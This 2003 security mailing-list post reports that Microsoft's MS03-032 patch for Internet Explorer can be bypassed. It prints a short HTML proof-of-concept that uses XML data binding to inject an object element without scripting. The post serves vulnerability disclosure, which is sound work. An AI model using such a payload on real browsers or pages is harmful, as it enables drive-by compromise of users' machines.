[VulnWatch] RE: BAD NEWS: Microsoft Security Bulletin MS03-032

From: GreyMagic Software (security_at_greymagic.com)
Date: 09/08/03

  • Next message: Marc Maiffret: "[VulnWatch] EEYE: Microsoft RPC Heap Corruption Vulnerability - Part II"
    To: "NTBugtraq" <NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM>, "Bugtraq" <bugtraq@securityfocus.com>, <full-disclosure@lists.netsys.com>, <vulnwatch@vulnwatch.org>
    Date: Mon, 8 Sep 2003 16:52:12 +0200
    
    

    >The patch for Drew's object data=funky.hta doesn't work:

    This is the exact same issue as http://greymagic.com/adv/gm001-ie/, which
    explains the problem in detail. Microsoft again patches the object element
    in HTML, but it doesn't patch the dynamic version of that same element.

    >1. Disable Active Scripting

    This actually means that no scripting is needed at all in order to exploit
    this amazingly critical vulnerability:

    <span datasrc="#oExec" datafld="exploit" dataformatas="html"></span>
    <xml id="oExec">
        <security>
            <exploit>
                <![CDATA[
                <object data=x.asp></object>
                ]]>
            </exploit>
        </security>
    </xml>

    Ouch.


  • Next message: Marc Maiffret: "[VulnWatch] EEYE: Microsoft RPC Heap Corruption Vulnerability - Part II"